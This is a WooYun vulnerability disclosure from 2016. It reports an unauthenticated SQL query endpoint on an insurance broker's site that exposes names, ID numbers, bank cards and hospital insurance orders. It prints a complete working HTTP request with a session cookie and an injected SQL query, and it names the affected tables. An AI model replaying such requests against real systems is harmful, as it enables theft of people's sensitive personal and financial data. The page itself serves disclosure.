当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0176939

漏洞标题:江泰保险大量用户信息涉及(姓名/身份证/银行卡等)20W+医院医保数据

相关厂商:江泰保险经纪股份有限公司

漏洞作者: 路人甲

提交时间:2016-02-19 11:20

修复时间:2016-02-24 11:30

公开时间:2016-02-24 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-19: 细节已通知厂商并且等待厂商处理中
2016-02-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

检测发现以下链接可直接查询数据库:http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp
在POST中写入查询语句即可~

POST http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Content-Length: 47
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Host: lib.jiangtai.com
Referer: http://lib.jiangtai.com/index/indexTest.jsp
Pragma: no-cache
Cache-Control: no-cache
Cookie: JSESSIONID=m9Q8WG2Gt3x2pVhJpbV1GH9RZh5nvyn3p5MRvhCsTBQDMpv63JyV!-1657701527; BIGipServerrenshou=1510215852.31337.0000
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
SELECT user from dual&1&0&0

漏洞证明:

1、大量用户信息泄漏,含姓名/身份证/银行卡等
表:llinpbnf/ljaget,近6W

QQ拼音截图未命名.jpg


QQ拼音截图未命名.jpg


2、大量医院医保订单泄漏,共20W+
表:llfeemain

QQ拼音截图未命名.jpg


3、大量订单信息泄漏
表:lfitemrelaorder,共2W+

QQ拼音截图未命名.jpg

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-24 11:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无